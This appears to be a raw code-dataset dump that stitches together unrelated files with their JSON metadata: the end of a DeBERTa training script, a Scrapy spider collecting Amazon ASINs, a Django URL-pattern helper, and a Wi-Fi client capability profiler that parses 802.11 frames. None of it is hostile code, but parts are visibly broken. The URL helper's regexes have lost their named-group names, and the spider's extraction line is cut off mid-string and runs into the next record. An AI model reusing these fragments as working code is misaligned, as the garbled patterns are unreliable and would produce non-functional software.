gather(data):\n data_chunks = [torch.zeros_like(data) for _ in range(args.world_size)]\n torch.distributed.all_gather(data_chunks, data)\n torch.cuda.synchronize()\n return data_chunks\n\n for data in data_list:\n if torch.distributed.is_initialized() and torch.distributed.get_world_size()>1:\n if isinstance(data, Sequence):\n data_chunks = []\n for d in data:\n chunks_ = gather(d)\n data_ = torch.cat(chunks_)\n data_chunks.append(data_)\n merged.append(data_chunks)\n else:\n data_chunks = gather(data)\n merged.extend(data_chunks)\n else:\n merged.append(data)\n if not isinstance(merged[0], Sequence):\n merged = torch.cat(merged)\n if max_len is not None:\n return merged[:max_len]\n else:\n return merged\n else:\n data_list=[]\n for d in zip(*merged):\n data = torch.cat(d)\n if max_len is not None:\n data = data[:max_len]\n data_list.append(data)\n return data_list\n\ndef calc_metrics(predicts, labels, eval_loss, eval_item, eval_results, args, name, prefix, steps, tag):\n tb_metrics = OrderedDict()\n result=OrderedDict()\n metrics_fn = eval_item.metrics_fn\n predict_fn = eval_item.predict_fn\n if metrics_fn is None:\n eval_metric = metric_accuracy(predicts, labels)\n else:\n metrics = metrics_fn(predicts, labels)\n result.update(metrics)\n critial_metrics = set(metrics.keys()) if eval_item.critial_metrics is None or len(eval_item.critial_metrics)==0 else eval_item.critial_metrics\n eval_metric = np.mean([v for k,v in 
metrics.items() if k in critial_metrics])\n result['eval_loss'] = eval_loss\n result['eval_metric'] = eval_metric\n result['eval_samples'] = len(labels)\n if args.rank<=0:\n output_eval_file = os.path.join(args.output_dir, \"eval_results_{}_{}.txt\".format(name, prefix))\n with open(output_eval_file, 'w', encoding='utf-8') as writer:\n logger.info(\"***** Eval results-{}-{} *****\".format(name, prefix))\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n tb_metrics[f'{name}/{key}'] = result[key]\n\n if predict_fn is not None:\n predict_fn(predicts, args.output_dir, name, prefix)\n else:\n output_predict_file = os.path.join(args.output_dir, \"predict_results_{}_{}.txt\".format(name, prefix))\n np.savetxt(output_predict_file, predicts, delimiter='\\t')\n output_label_file = os.path.join(args.output_dir, \"predict_labels_{}_{}.txt\".format(name, prefix))\n np.savetxt(output_label_file, labels, delimiter='\\t')\n\n if not eval_item.ignore_metric:\n eval_results[name]=(eval_metric, predicts, labels)\n _tag = tag + '/' if tag is not None else ''\n def _ignore(k):\n ig = ['/eval_samples', '/eval_loss']\n for i in ig:\n if k.endswith(i):\n return True\n return False\n\ndef run_eval(args, model, device, eval_data, prefix=None, tag=None, steps=None):\n # Run prediction for full data\n prefix = f'{tag}_{prefix}' if tag is not None else prefix\n eval_results=OrderedDict()\n eval_metric=0\n no_tqdm = (True if os.getenv('NO_TQDM', '0')!='0' else False) or args.rank>0\n for eval_item in eval_data:\n name = eval_item.name\n eval_sampler = SequentialSampler(len(eval_item.data))\n batch_sampler = BatchSampler(eval_sampler, args.eval_batch_size)\n batch_sampler = DistributedBatchSampler(batch_sampler, rank=args.rank, world_size=args.world_size)\n eval_dataloader = DataLoader(eval_item.data, batch_sampler=batch_sampler, num_workers=args.workers)\n model.eval()\n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n predicts=[]\n labels=[]\n for batch in tqdm(AsyncDataLoader(eval_dataloader), ncols=80, desc='Evaluating: {}'.format(prefix), disable=no_tqdm):\n batch = batch_to(batch, device)\n with torch.no_grad():\n logits, tmp_eval_loss = model(**batch)\n label_ids = batch['labels'].to(device)\n predicts.append(logits)\n labels.append(label_ids)\n eval_loss += tmp_eval_loss.mean().item()\n input_ids = batch['input_ids']\n nb_eval_examples += input_ids.size(0)\n nb_eval_steps += 1\n\n eval_loss = eval_loss / nb_eval_steps\n predicts = merge_distributed(predicts, len(eval_item.data))\n labels = merge_distributed(labels, len(eval_item.data))\n if isinstance(predicts, Sequence):\n for k,pred in enumerate(predicts):\n calc_metrics(pred.detach().cpu().numpy(), labels.detach().cpu().numpy(), eval_loss, eval_item, eval_results, args, name + f'@{k}', prefix, steps, tag)\n else:\n calc_metrics(predicts.detach().cpu().numpy(), labels.detach().cpu().numpy(), eval_loss, eval_item, eval_results, args, name, prefix, steps, tag)\n\n return eval_results\n\ndef run_predict(args, model, device, eval_data, prefix=None):\n # Run prediction for full data\n eval_results=OrderedDict()\n eval_metric=0\n for eval_item in eval_data:\n name = eval_item.name\n eval_sampler = SequentialSampler(len(eval_item.data))\n batch_sampler = BatchSampler(eval_sampler, args.eval_batch_size)\n batch_sampler = DistributedBatchSampler(batch_sampler, rank=args.rank, world_size=args.world_size)\n eval_dataloader = DataLoader(eval_item.data, 
batch_sampler=batch_sampler, num_workers=args.workers)\n model.eval()\n predicts=None\n for batch in tqdm(AsyncDataLoader(eval_dataloader), ncols=80, desc='Evaluating: {}'.format(prefix), disable=args.rank>0):\n batch = batch_to(batch, device)\n with torch.no_grad():\n logits, _ = model(**batch)\n if args.world_size>1:\n logits_all = [torch.zeros_like(logits) for _ in range(args.world_size)]\n torch.distributed.all_gather(logits_all, logits)\n torch.cuda.synchronize()\n logits = torch.cat(logits_all)\n logits = logits.detach().cpu().numpy()\n if predicts is None:\n predicts = np.copy(logits)\n else:\n predicts = np.append(predicts, logits, axis=0)\n \n predicts = predicts[:len(eval_item.data)]\n if args.rank<=0:\n output_test_file = os.path.join(args.output_dir, \"test_logits_{}_{}.txt\".format(name, prefix))\n logger.info(\"***** Dump prediction results-{}-{} *****\".format(name, prefix))\n logger.info(\"Location: {}\".format(output_test_file))\n np.savetxt(output_test_file, predicts, delimiter='\\t')\n predict_fn = eval_item.predict_fn\n if predict_fn:\n predict_fn(predicts, args.output_dir, name, prefix)\n\ndef main(args):\n if not args.do_train and not args.do_eval and not args.do_predict:\n raise ValueError(\"At least one of `do_train` or `do_eval` or `do_predict` must be True.\")\n os.makedirs(args.output_dir, exist_ok=True)\n task_name = args.task_name.lower()\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n\n tokenizer = GPT2Tokenizer()\n processor = tasks[task_name](tokenizer = tokenizer, max_seq_len = args.max_seq_length, data_dir = args.data_dir)\n label_list = processor.get_labels()\n\n eval_data = processor.eval_data(max_seq_len=args.max_seq_length)\n logger.info(\" Evaluation batch size = %d\", args.eval_batch_size)\n if args.do_predict:\n test_data = processor.test_data(max_seq_len=args.max_seq_length)\n logger.info(\" Prediction batch size = %d\", args.predict_batch_size)\n\n if args.do_train:\n train_data = processor.train_data(max_seq_len=args.max_seq_length, mask_gen = None, debug=args.debug)\n model_class_fn = processor.get_model_class_fn()\n model = create_model(args, len(label_list), model_class_fn)\n if args.do_train:\n with open(os.path.join(args.output_dir, 'model_config.json'), 'w', encoding='utf-8') as fs:\n fs.write(model.config.to_json_string() + '\\n')\n logger.info(\"Model config {}\".format(model.config))\n device = initialize_distributed(args)\n if not isinstance(device, torch.device):\n return 0\n model.to(device)\n if args.do_eval:\n run_eval(args, model, device, eval_data, prefix=args.tag)\n\n if args.do_train:\n train_model(args, model, device, train_data, eval_data)\n\n if args.do_predict:\n run_predict(args, model, device, test_data, prefix=args.tag)\n\ndef build_argument_parser():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument(\"--task_name\",\n default=None,\n type=str,\n required=True,\n help=\"The name of the task to train.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model checkpoints will be written.\")\n\n ## Other parameters\n parser.add_argument(\"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. 
\\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_train\",\n default=False,\n action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\",\n default=False,\n action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_predict\",\n default=False,\n action='store_true',\n help=\"Whether to run prediction on the test set.\")\n parser.add_argument(\"--train_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for training.\")\n parser.add_argument(\"--eval_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for eval.\")\n parser.add_argument(\"--predict_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for prediction.\")\n parser.add_argument(\"--max_grad_norm\",\n default=1,\n type=float,\n help=\"The clip threshold of global gradient norm\")\n parser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--epsilon\",\n default=1e-6,\n type=float,\n help=\"epsilon setting for Adam.\")\n parser.add_argument(\"--adam_beta1\",\n default=0.9,\n type=float,\n help=\"The beta1 parameter for Adam.\")\n parser.add_argument(\"--adam_beta2\",\n default=0.999,\n type=float,\n help=\"The beta2 parameter for Adam.\")\n parser.add_argument(\"--num_train_epochs\",\n default=3.0,\n type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\",\n default=0.1,\n type=float,\n help=\"Proportion of training to perform linear learning rate warmup for. \"\n \"E.g., 0.1 = 10%% of training.\")\n parser.add_argument(\"--lr_schedule_ends\",\n default=0,\n type=float,\n help=\"The ended learning rate scale for learning rate scheduling\")\n parser.add_argument(\"--lr_schedule\",\n default='warmup_linear',\n type=str,\n help=\"The learning rate scheduler used for traning. \"\n \"E.g. warmup_linear, warmup_linear_shift, warmup_cosine, warmup_constant. 
Default, warmup_linear\")\n\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n\n parser.add_argument('--seed',\n type=int,\n default=1234,\n help=\"random seed for initialization\")\n\n parser.add_argument('--accumulative_update',\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n\n parser.add_argument('--fp16',\n default=False,\n type=boolean_string,\n help=\"Whether to use 16-bit float precision instead of 32-bit\")\n\n parser.add_argument('--loss_scale',\n type=float, default=256,\n help='Loss scaling, positive power of 2 values can improve fp16 convergence.')\n\n parser.add_argument('--scale_steps',\n type=int, default=1000,\n help='The steps to wait to increase the loss scale.')\n\n parser.add_argument('--init_model',\n type=str,\n help=\"The model state file used to initialize the model weights.\")\n\n parser.add_argument('--model_config',\n type=str,\n help=\"The config file of bert model.\")\n\n parser.add_argument('--cls_drop_out',\n type=float,\n default=None,\n help=\"The config file model initialization and fine tuning.\")\n parser.add_argument('--weight_decay',\n type=float,\n default=0.01,\n help=\"The weight decay rate\")\n\n parser.add_argument('--tag',\n type=str,\n default='final',\n help=\"The tag name of current prediction/runs.\")\n\n parser.add_argument(\"--dump_interval\",\n default=10000,\n type=int,\n help=\"Interval steps for generating checkpoint.\")\n\n parser.add_argument('--lookahead_k',\n default=-1,\n type=int,\n help=\"lookahead k parameter\")\n\n parser.add_argument('--lookahead_alpha',\n default=0.5,\n type=float,\n help=\"lookahead alpha parameter\")\n\n parser.add_argument('--with_radam',\n default=False,\n type=boolean_string,\n help=\"whether to use RAdam\")\n\n parser.add_argument('--opt_type',\n type=str.lower,\n default='adam',\n choices=['adam', 'admax'],\n help=\"The optimizer to be used.\")\n\n parser.add_argument('--workers',\n type=int,\n default=2,\n help=\"The workers to load data.\")\n\n parser.add_argument('--debug',\n default=False,\n type=boolean_string,\n help=\"Whether to cache cooked binary features\")\n\n parser.add_argument('--pre_trained',\n default=None,\n type=str,\n help=\"The path of pre-trained RoBERTa model\")\n return parser\n\nif __name__ == \"__main__\":\n parser = build_argument_parser()\n args = parser.parse_args()\n logger = set_logger(args.task_name, os.path.join(args.output_dir, 'training_{}.log'.format(args.task_name)))\n logger.info(args)\n try:\n main(args)\n except Exception as ex:\n try:\n logger.exception(f'Uncatched exception happened during execution.')\n import atexit\n atexit._run_exitfuncs()\n except:\n pass\n kill_children()\n os._exit(-1)\n","sub_path":"DeBERTa/apps/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124477762","text":"import scrapy\nimport re\n\nclass ASIN_Spider(scrapy.Spider):\n name = \"ASIN_Spider\"\n start_urls = ['https://www.amazon.com/s?k=water&ref=nb_sb_noss_2']\n\n def __int__(self, query):\n self.query = query\n\n def parse(self, response):\n ASIN_dict = {}\n for ind in range(2, 200):\n try:\n asin_div = response.xpath(\"/html/body/div[1]/div[2]/div[1]/div[2]/div/span[3]/div[2]/div[\"+str(ind)+\"]\").re_first(\"
[\\w-]+)'\npk = r'(?P\\d+)'\nuuid4 = r'(?P[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12})' # noqa\nrest = r'(?P[\\w\\-\\_\\.\\@\\:/]*)' # match anything acceptable in URL\n\nyear = r'(?P\\d{4})'\nmonth = r'(?P0?([1-9])|10|11|12)'\nday = r'(?P(0|1|2)?([1-9])|[1-3]0|31)'\n\nSEPARATOR = '/' # separator for parts of the url\n\nRE_TYPE = re._pattern_type # pylint:disable=protected-access\n\n\nclass URLPattern(object):\n \"\"\"The main urljects object able to join strings and regular expressions.\n\n The value of this object will always be regular expression usable in django\n url.\n \"\"\"\n\n def __init__(self, value=None, separator=SEPARATOR, ends=True):\n \"\"\"\n :param value: Initial value of the URL\n :param separator: used to separate parts of the url, usually /\n :param ends: open urls should be used only for included urls\n \"\"\"\n self.parts = [value.strip(separator)] if value else []\n self.separator = separator\n self.ends = ends\n if value:\n warnings.warn(DeprecationWarning(\n \"'value' in URLPattern constructor will be removed\"))\n self.add_part(value)\n\n def add_part(self, part):\n \"\"\"\n Function for adding partial pattern to the value\n :param part: string or compiled pattern\n \"\"\"\n if isinstance(part, RE_TYPE):\n part = part.pattern\n\n # stripping separator enables translated urls with hint what\n # string is actual url and which is a normal word\n # url(U / _('/my-profile'), private.Home, name=\"admin-home\"),\n self.parts.append(part.strip(self.separator))\n return self\n\n def get_value(self, ends_override=None):\n \"\"\"\n This function finishes the url pattern creation by adding starting\n character ^ end possibly by adding end character at the end\n\n :param ends_override: overrides ``self.ends``\n :return: raw string\n \"\"\"\n value = self.separator.join(self.parts)\n ends = ends_override if ends_override is not None else self.ends\n\n if not value: # use case: wild card imports\n if ends:\n return r'^$'\n return r'^'\n\n if value[0] != beginning:\n value = beginning + value\n\n if ends and value[-1] != end:\n value += end\n\n # included views usually ends with separator\n if not ends and value[-1] != self.separator:\n value += self.separator\n\n return value\n\n def __div__(self, other):\n \"\"\"\n PY2 division\n \"\"\"\n return self.add_part(other)\n\n def __truediv__(self, other):\n \"\"\"\n PY3 division\n \"\"\"\n return self.add_part(other)\n\n def __repr__(self):\n return self.get_value() or ''\n\n\nclass URLFactory(object):\n \"\"\"Create new URLPattern on every beginning of a new URL.\"\"\"\n\n def __div__(self, other):\n return URLPattern().add_part(other)\n __truediv__ = __div__\n\n def get_value(self, ends_override=None):\n \"\"\"Dispatch the call to URLPattern instance.\"\"\"\n return URLPattern().add_part('').get_value(ends_override)\n __repr__ = get_value\n __str__ = get_value\n\n\nU = URLFactory()\n","sub_path":"urljects/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61699055","text":"# -*- coding: utf-8 -*-\n#\n# profiler2: a Wi-Fi client capability analyzer\n# Copyright 2020 Josh Schmelzle\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. 
Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\nprofiler2.profiler\n~~~~~~~~~~~~~~~~~~\n\nprofiler code goes here, separate from fake ap code.\n\"\"\"\n\n# standard library imports\nimport csv\nimport inspect\nimport logging\nimport os\nimport sys\nimport time\nfrom difflib import Differ\nfrom multiprocessing.queues import Queue\nfrom typing import Tuple\n\n# third party imports\nfrom manuf import manuf\nfrom scapy.all import wrpcap\n\n# app imports\nfrom .constants import (EXT_CAPABILITIES_IE_TAG, EXT_IE_TAG,\n FT_CAPABILITIES_IE_TAG, HT_CAPABILITIES_IE_TAG,\n POWER_MIN_MAX_IE_TAG, RM_CAPABILITIES_IE_TAG,\n RSN_CAPABILITIES_IE_TAG, SUPPORTED_CHANNELS_IE_TAG,\n VENDOR_SPECIFIC_IE_TAG, VHT_CAPABILITIES_IE_TAG)\nfrom .helpers import Capability, flag_last_object\n\n\nclass Profiler(object):\n \"\"\" Code handling analysis of client capablities \"\"\"\n\n def __init__(self, config=None, queue=None):\n self.log = logging.getLogger(inspect.stack()[0][1].split(\"/\")[-1])\n self.log.debug(\"profiler pid: %s; parent pid: %s\", os.getpid(), os.getppid())\n self.analyzed_hash = {}\n self.config = config\n if config:\n self.channel = int(config.get(\"GENERAL\").get(\"channel\"))\n self.ssid = config.get(\"GENERAL\").get(\"ssid\")\n self.files_path = config.get(\"GENERAL\").get(\"files_path\")\n self.pcap_analysis = config.get(\"GENERAL\").get(\"pcap_analysis\")\n self.ft_disabled = config.get(\"GENERAL\").get(\"ft_disabled\")\n self.he_disabled = config.get(\"GENERAL\").get(\"he_disabled\")\n self.reports_dir = os.path.join(self.files_path, \"reports\")\n self.clients_dir = os.path.join(self.files_path, \"clients\")\n self.csv_file = os.path.join(\n self.reports_dir, f\"profiler-{time.strftime('%Y-%m-%d')}.csv\"\n )\n self.client_profiled_count = 0\n self.lookup = manuf.MacParser(update=False)\n self.last_manuf = \"N/A\"\n\n if queue:\n while True:\n self.profile(queue)\n\n def __del__(self):\n \"\"\" Clean up while we shut down \"\"\"\n\n def is_randomized(self, mac) -> bool:\n \"\"\" Check if MAC Address :'00:00:00:00:00:00' is locally assigned \"\"\"\n return any(local == mac[1] for local in [\"2\", \"6\", \"a\", \"e\"])\n\n def profile(self, queue: Queue) -> None:\n \"\"\" Handle profiling clients as they come into the queue \"\"\"\n frame = queue.get()\n oui_manuf, capabilities = self.analyze_assoc_req(frame)\n analysis_hash = hash(f\"{frame.addr2}: 
{capabilities}\")\n if analysis_hash in self.analyzed_hash.keys():\n self.log.debug(\n \"already seen %s (capabilities hash=%s) this session, ignoring...\",\n frame.addr2,\n analysis_hash,\n )\n else:\n\n if self.is_randomized(frame.addr2):\n if oui_manuf is None:\n oui_manuf = \"Randomized MAC\"\n else:\n oui_manuf = \"{0} (Randomized MAC)\".format(oui_manuf)\n\n self.last_manuf = oui_manuf\n self.log.debug(\"%s oui lookup matched to %s\", frame.addr2, oui_manuf)\n self.analyzed_hash[analysis_hash] = frame\n text_report = self.generate_text_report(\n oui_manuf, capabilities, frame.addr2, self.channel\n )\n\n self.log.info(\"text report\\n%s\", text_report)\n\n if self.channel < 15:\n band = \"2.4GHz\"\n elif self.channel > 30 and self.channel < 170:\n band = \"5.8GHz\"\n else:\n band = \"unknown\"\n\n self.log.debug(\n \"writing text and csv report for %s (capabilities hash=%s)\",\n frame.addr2,\n analysis_hash,\n )\n self.write_analysis_to_file_system(\n text_report, capabilities, frame, oui_manuf, band\n )\n\n self.client_profiled_count += 1\n self.log.debug(\"%s clients profiled\", self.client_profiled_count)\n\n # if we end up sending multiple frames from pcap for profiling - this will need changed\n if self.pcap_analysis:\n self.log.info(\n \"exiting because we were told to only analyze %s\",\n self.pcap_analysis,\n )\n sys.exit()\n\n @staticmethod\n def generate_text_report(\n oui_manuf: str, capabilities: list, client_mac: str, channel: int\n ) -> str:\n \"\"\" Generate a report for output \"\"\"\n # start report\n text_report = \"-\" * 45\n text_report += f\"\\n - Client MAC: {client_mac}\"\n text_report += f\"\\n - OUI manufacturer lookup: {oui_manuf or 'Unknown'}\"\n text_report += f\"\\n - Capture channel: {channel}\\n\"\n text_report += \"-\" * 45\n text_report += \"\\n\"\n for capability in capabilities:\n if capability.name is not None and capability.value is not None:\n text_report += (\n \"{0:<20} {1:<20}\".format(capability.name, capability.value) + \"\\n\"\n )\n\n text_report += \"\\n* Reported client capabilities are dependent on available features at time of client association.\"\n text_report += \"\\n** Reported channels do not factor local regulatory domain.\"\n return text_report\n\n def write_analysis_to_file_system(\n self, text_report, capabilities, frame, oui_manuf, band\n ):\n \"\"\" Write report files out to a directory on the WLAN Pi \"\"\"\n log = logging.getLogger(inspect.stack()[0][3])\n # dump out the text to a file\n client_mac = frame.addr2.replace(\":\", \"-\", 5)\n dest = os.path.join(self.clients_dir, client_mac)\n\n if not os.path.isdir(dest):\n try:\n os.mkdir(dest)\n except Exception:\n log.error(\"problem creating %s directory\", dest)\n sys.exit(-1)\n\n filename = os.path.join(dest, f\"{client_mac}_{band}.txt\")\n\n try:\n if os.path.exists(filename):\n\n existing = open(filename, \"r\").readlines()\n temp = []\n for line in existing:\n temp.append(line.replace(\"\\n\", \"\"))\n existing = temp\n new = text_report.split(\"\\n\")\n # strip header when comparing existing file from newly profiled\n if existing[5:] == new[5:]:\n pass\n else:\n text_report = list(\n Differ().compare(existing, text_report.split(\"\\n\"))\n )\n filename = filename.replace(\".txt\", \"_changed.txt\")\n text_report = \"\\n\".join(text_report)\n with open(filename, \"w\") as writer:\n writer.write(text_report)\n except Exception:\n log.exception(\"error creating flat file to dump client info (%s)\", filename)\n sys.exit(-1)\n\n out_row = {\"Client_Mac\": client_mac, 
\"OUI_Manuf\": oui_manuf}\n\n out_fieldnames = [\"Client_Mac\", \"OUI_Manuf\"]\n\n for capability in capabilities:\n if capability.name is not None and capability.value is not None:\n out_fieldnames.append(capability.name)\n out_row[capability.name] = capability.value\n\n # dump out the frame to a file\n filename = os.path.splitext(filename)[0] + \".pcap\"\n wrpcap(filename, [frame])\n\n # check if csv file exists\n if not os.path.exists(self.csv_file):\n\n # create file with csv headers\n with open(self.csv_file, mode=\"w\") as file_obj:\n writer = csv.DictWriter(file_obj, fieldnames=out_fieldnames)\n writer.writeheader()\n\n # append data to csv file\n with open(self.csv_file, mode=\"a\") as file_obj:\n writer = csv.DictWriter(file_obj, fieldnames=out_fieldnames)\n writer.writerow(out_row)\n\n @staticmethod\n def process_information_elements(buffer: bytes) -> dict:\n \"\"\"\n Parse a 802.11 payload and returns a dict of IEs\n\n Does not handle headers or FCS.\n\n You must strip those before passing the payload in.\n \"\"\"\n # init element vars\n information_elements = {}\n element_id = 0\n element_length = 0\n element_data = []\n # loop tracking vars\n is_index_byte = True\n is_length_byte = True\n index = 0\n for byte, last in flag_last_object(buffer):\n if is_index_byte:\n element_id = byte\n is_index_byte = False\n continue\n if is_length_byte:\n element_length = byte\n is_length_byte = False\n continue\n if index < element_length:\n index += 1\n element_data.append(byte)\n else:\n if element_id in [VENDOR_SPECIFIC_IE_TAG, EXT_IE_TAG]:\n # map a list of data items to the key\n if element_id in information_elements:\n information_elements[element_id].append(element_data)\n else:\n information_elements[element_id] = [element_data]\n else:\n # map the data to the key\n information_elements[element_id] = element_data\n\n # reset vars to decode next information element\n index = 0\n is_index_byte = True\n is_length_byte = True\n element_data = []\n element_id = 0\n element_length = 0\n # current byte should be next index byte\n element_id = byte\n is_index_byte = False\n continue\n if last:\n if element_id in [VENDOR_SPECIFIC_IE_TAG, EXT_IE_TAG]:\n # map a list of data items to the key\n if element_id in information_elements:\n information_elements[element_id].append(element_data)\n else:\n information_elements[element_id] = [element_data]\n else:\n # map the data to the key\n information_elements[element_id] = element_data\n\n return information_elements\n\n def resolve_oui_manuf(self, mac: str, dot11_elt_dict: dict) -> str:\n \"\"\" Resolve client's manuf using manuf database and other heuristics \"\"\"\n log = logging.getLogger(inspect.stack()[0][3])\n\n # log.debug(\"starting oui lookup for %s\", mac)\n oui_manuf = self.lookup.get_manuf(mac)\n\n # vendor OUI that we possibly want to check for a more clear OUI match\n low_quality = \"muratama\"\n\n if oui_manuf is None or oui_manuf.lower().startswith(low_quality):\n # inspect vendor specific IEs and see if there's an IE with\n # an OUI that we know can only be included if the manuf\n # of the client is the vendor that maps to that OUI\n if VENDOR_SPECIFIC_IE_TAG in dot11_elt_dict.keys():\n for element_data in dot11_elt_dict[VENDOR_SPECIFIC_IE_TAG]:\n vendor_mac = \"{0:02X}:{1:02X}:{2:02X}:00:00:00\".format(\n element_data[0], element_data[1], element_data[2]\n )\n oui_manuf_vendor = self.lookup.get_manuf(vendor_mac)\n if oui_manuf_vendor is not None:\n # Matches are vendor specific IEs we know are client specific\n # e.g. 
Apple vendor specific IEs can only be found in Apple devices\n # Samsung may follow similar logic based on S10 5G testing, but unsure\n matches = (\"apple\", \"samsung\")\n if oui_manuf_vendor.lower().startswith(matches):\n oui_manuf = oui_manuf_vendor\n\n log.debug(\"finished oui lookup for %s: %s\", mac, oui_manuf)\n return oui_manuf\n\n @staticmethod\n def analyze_ht_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11n support \"\"\"\n dot11n = Capability(\n name=\"802.11n\", value=\"Not reported*\", db_key=\"802.11n\", db_value=0\n )\n dot11n_ss = Capability(db_key=\"802.11n_ss\", db_value=0)\n\n if HT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n\n spatial_streams = 0\n\n # mcs octets 1 - 4 indicate # streams supported (up to 4 streams only)\n for mcs_octet in range(3, 7):\n\n mcs_octet_value = dot11_elt_dict[HT_CAPABILITIES_IE_TAG][mcs_octet]\n\n if mcs_octet_value & 255:\n spatial_streams += 1\n\n dot11n.value = f\"Supported ({spatial_streams}ss)\"\n dot11n.db_value = 1\n dot11n_ss.db_value = spatial_streams\n\n return [dot11n, dot11n_ss]\n\n @staticmethod\n def analyze_vht_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11ac support \"\"\"\n dot11ac = Capability(\n name=\"802.11ac\", value=\"Not reported*\", db_key=\"802.11ac\", db_value=0\n )\n dot11ac_ss = Capability(db_key=\"802.11ac_ss\", db_value=0)\n dot11ac_su_bf = Capability(db_key=\"802.11ac_su_bf\", db_value=0)\n dot11ac_mu_bf = Capability(db_key=\"802.11ac_mu_bf\", db_value=0)\n\n if VHT_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n # Check for number streams supported\n mcs_upper_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][5]\n mcs_lower_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][4]\n mcs_rx_map = (mcs_upper_octet * 256) + mcs_lower_octet\n\n # define the bit pair we need to look at\n spatial_streams = 0\n stream_mask = 3\n\n # move through each bit pair & test for '10' (stream supported)\n for _mcs_bits in range(1, 9):\n\n if (mcs_rx_map & stream_mask) != stream_mask:\n\n # stream mask bits both '1' when mcs map range not supported\n spatial_streams += 1\n\n # shift to next mcs range bit pair (stream)\n stream_mask = stream_mask * 4\n\n dot11ac.value = f\"Supported ({spatial_streams}ss)\"\n dot11ac.db_value = 1\n dot11ac_ss.db_value = spatial_streams\n\n # check for SU & MU beam formee support\n mu_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][2]\n su_octet = dot11_elt_dict[VHT_CAPABILITIES_IE_TAG][1]\n\n beam_form_mask = 16\n\n # bit 4 indicates support for both octets (1 = supported, 0 = not supported)\n if su_octet & beam_form_mask:\n dot11ac.value += \", SU BF supported\"\n dot11ac_su_bf.db_value = 1\n else:\n dot11ac.value += \", SU BF not supported\"\n\n if mu_octet & beam_form_mask:\n dot11ac.value += \", MU BF supported\"\n dot11ac_mu_bf.db_value = 1\n else:\n dot11ac.value += \", MU BF not supported\"\n\n return [dot11ac, dot11ac_ss, dot11ac_su_bf, dot11ac_mu_bf]\n\n @staticmethod\n def analyze_rm_capabilities_ie(dot11_elt_dict: dict) -> []:\n \"\"\" Check for 802.11k support \"\"\"\n dot11k = Capability(\n name=\"802.11k\",\n value=\"Not reported* - treat with caution, many clients lie about this\",\n db_key=\"802.11k\",\n db_value=0,\n )\n if RM_CAPABILITIES_IE_TAG in dot11_elt_dict.keys():\n dot11k.value = \"Supported\"\n dot11k.db_value = 1\n\n return [dot11k]\n\n @staticmethod\n def analyze_ft_capabilities_ie(dot11_elt_dict: dict, ft_disabled: bool) -> []:\n \"\"\" Check for 802.11r support \"\"\"\n dot11r = Capability(\n name=\"802.11r\", value=\"Not 
